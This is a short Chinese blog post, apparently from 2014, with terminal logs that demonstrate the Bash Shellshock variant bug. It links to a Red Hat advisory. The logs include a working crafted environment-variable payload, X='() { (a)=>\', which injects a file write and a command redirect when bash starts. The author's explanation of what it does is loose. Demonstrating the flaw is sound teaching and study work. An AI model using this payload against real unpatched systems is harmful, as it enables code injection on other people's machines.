1. 通过设置一个特殊的环境变量的env,能间接地查到到linux命令的属性,如下:
-
[2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date
-
ls: cannot access date: No such file or directory
-
-
[2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'
-
bash: X: line 1: syntax error near unexpected token `='
-
bash: X: line 1: `'
-
bash: error importing function definition for `X'
-
-
[2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date
-
-rw-rw-r--. 1 david david 0 Sep 27 13:01 date
-
[2014-09-27 13:01:27 david@davidcchen ~]$
2. 一次运行环境变量。
-
[2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version
-
zsh 4.3.10 (x86_64-redhat-linux-gnu)
-
-
[2014-09-27 13:03:24 david@davidcchen ~]$ bash --version
-
GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)
-
Copyright (C) 2009 Free Software Foundation, Inc.
-
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
-
-
This is free software; you are free to change and redistribute it.
-
There is NO WARRANTY, to the extent permitted by law.
-
-
[2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo
-
bash: X: line 1: syntax error near unexpected token `='
-
bash: X: line 1: `'
-
bash: error importing function definition for `X'
-
Sat Sep 27 13:03:52 CST 2014
-
-
---------->成功运行date命令
-
[2014-09-27 13:03:52 david@davidcchen ~]$
外部参考
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack
阅读(7078) | 评论(0) | 转发(2) |